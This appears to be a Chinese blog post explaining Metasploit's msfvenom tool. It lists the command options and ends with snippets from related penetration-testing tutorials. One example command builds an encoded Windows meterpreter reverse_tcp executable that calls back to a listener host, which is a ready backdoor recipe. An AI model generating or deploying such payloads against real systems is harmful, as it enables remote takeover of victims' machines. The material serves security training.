metasploit之msfvenom功能

有木有常常需要把msfpayload获得的内容通过R命令导入管道输出至msfencode中进行编码,有木有觉得这一切很麻烦,

metasploit的开发人员早就想到了。msfvenom是msfpayload和msfencode的结合体,用起来更方便了。

Usage:msfvenom [options] <var=val>

Options:
    -p, --payload    <payload>       Payload to use. Specify a ‘-‘ or stdin to use custom payloads
    -l, --list       [module_type]   List a module type example: payloads, encoders, nops, all
    -n, --nopsled    <length>        Prepend a nopsled of [length] size on to the payload
    -f, --format     <format>        Output format (use --help-formats for a list)
    -e, --encoder    [encoder]       The encoder to use
    -a, --arch       <architecture>  The architecture to use:
        --platform   <platform>      The platform of the payload
    -s, --space      <length>        The maximum size of the resulting payload
    -b, --bad-chars  <list>          The list of characters to avoid example: ‘\x00\xff‘
    -i, --iterations <count>         The number of times to encode the payload
    -c, --add-code   <path>          Specify an additional win32 shellcode file to include
    -x, --template   <path>          Specify a custom executable file to use as a template
    -k, --keep                       Preserve the template behavior and inject the payload as a new thread
    -o, --options                    List the payload‘s standard options
    -h, --help                       Show this message
        --help-formats               List available formats

example:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.1 LPORT=4444 -e x86/shikata_ga_nai -b ‘0x00‘ -i 5 -f exe >test.exe

同时分享一个比较好的metasploit学习网站:

http://www.offensive-security.com/metasploit-unleashed/Main_Page

免费学习,捐赠的资金用于资助贫困地区的教育。

metasploit之msfvenom功能

时间: 2024-11-07 04:20:10

metasploit之msfvenom功能的相关文章

metasploit框架介绍(一)

Metasploit体系框架 V4版本体系结构: Metasploit设计尽可能采用模块化的理念:在基础库的基础上,提供了一些核心框架功能的的支持:实现渗透测试的功能的主体代码则以模块化方式组织,并按照不同用途分为6种类型模块:为了扩充metasploit框架对渗透测试全过程的支持功能特性,metasploit还引入了插件机制,支持将外部的安全工具集成到框架中:metasploit框架对集成模块与插件的渗透测试功能,通过用户接口与功能程序提供给渗透测试者进行使用. 基础库文件 metasploi

Metasploit 渗透测试魔鬼训练营读书笔记(连续更新一)

1.1 什么是渗透测试 1.1.1 渗透测试的起源与定义 如果大家对军事感兴趣,会知道各国军队每年都会组织一些军事演习来锻炼军队的攻防战术与作战能力.在信息科技的发源地--美国的军事演习中,将美军称为"蓝军",将假想敌称为"红军",而这种军事演习的方式也在20世纪90年代时,由美国军方与国家安全局引入到对信息网络与信息安全基础设施的实际攻防测试过程中.由一群受过职业训练的安全专家作为"红队"(Red Team),对接受测试的防御方"蓝队

Kali Linux Web 渗透测试— 第二十课-metasploit.meterpreter

Kali Linux Web 渗透测试— 第二十课-metasploit.meterpreter 原文链接:http://www.xuanhun521.com/Blog/7fc11b7a-b6cb-401d-8641-5202c9b7864a 文/玄魂 目录 Kali Linux Web 渗透测试— 第二十课-metasploit.meterpreter........................ 1 Meterpreter..................................

Exp2 后门原理与实践(未完待续)

Exp2 后门原理与实践 实验环境 攻击机 kali 4.14(64位) (IP: 10.0.2.6/24) 靶机 ubuntu 16.04(32位) (IP: 10.0.2.4/24) windows 7 sp1(64位) (IP: 10.0.2.7/24) nc/ncat的使用 nc(全称是netcat)是一个用于TCP/UDP连接和监听的linux工具,有着网络工具中的"瑞士军刀"的美誉.nc的实现版本大致有两种,一种是带有-e或-c 选项可以直接给出执行命令,另一种不支持-e选

2019-2020-2 20174319 安睿韬《网络对抗技术》Exp2 后门原理与实践

目录 一. 实验内容明及预备知识 1.基础知识 2.实验内容 二. 软件下载及功能测试 任务一:Windows获得Linux Shell 任务二:Linux获得Windows Shell 任务三:使用nc传输数据 三. Meterpreter 四. 实验任务 任务一:使用netcat获取主机操作Shell,cron启动 任务二:使用socat获取主机操作Shell, 任务计划启动 任务三:使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取

Metasploit 使用msfconsole帮助功能技巧

Metasploit 使用msfconsole帮助功能技巧 当用户使用Metasploit框架时,通常都是直接执行msfconsole,进入MSF终端.此时,将使用所有默认设置启动了Metasploit框架.用户也可以在启动时,进行简单配置.为了帮助用户配置Metasploit框架,启动MSF终端时,使用msfconsole --help技巧查看更多可以配置的选项.然后,在执行msfconsole时,指定配置的选项参数即可.例如,设置退出Metasploit时,提示确定退出Metasploit.

Metasploit制作免杀后门-----msfvenom

真正全部免杀是不会的,部分还是可以,主要是介绍msfvenom.-----现在依然还有很多教学视频.资料是使用之前的kali版本.随着更新有些命令是不适应最新的kali的.(也是掉过坑的人)msfvenom集成了msfpayload和msfencode,2015年之后移除了后两项.再按照某些教程输后两个命令是不行的. msfvenom重要参数:(可以使用msfvenom -h查看所有参数)-p payload设置 -e 编码设置-a 系统结构,默认x86-s payload最大大小-i 编码次数

metasploit快速入门

今天没上班,在小黑屋里看了一个一百多页的书<metasploit新手指南>,在此将笔记分享给大家.欢迎大家批评指正,共同学习进步.   metasploit新手指南 笔记 kali 0x01 metapoit基本文件结构如下: config metasploit的环境配置信息,数据库配置信息 data渗透后模块的一些工具及payload,第三方小工具集合,用户字典等数据信息 Db rails编译生成msf的web框架的数据库信息 Documentation 用户说明文档及开发文档 Extern

metasploit framework详解

metasploit介绍 几乎每一个玩渗透的人都会接触到metasploit framework,简称msf.这是一个渗透测试框架,用ruby语言写的,该框架集成了很多可用的exploit,比如著名的ms08_067等.你可以在这个框架下进行一系列的渗透测试,利用现有的payload,如meterpreter等进一步拿取对方的shell.下载的地址在github上面,git clone该项目到本地进行安装即可. 常用工具介绍 msfconsole 这是启动msf的终端命令,注意因为现在msf默认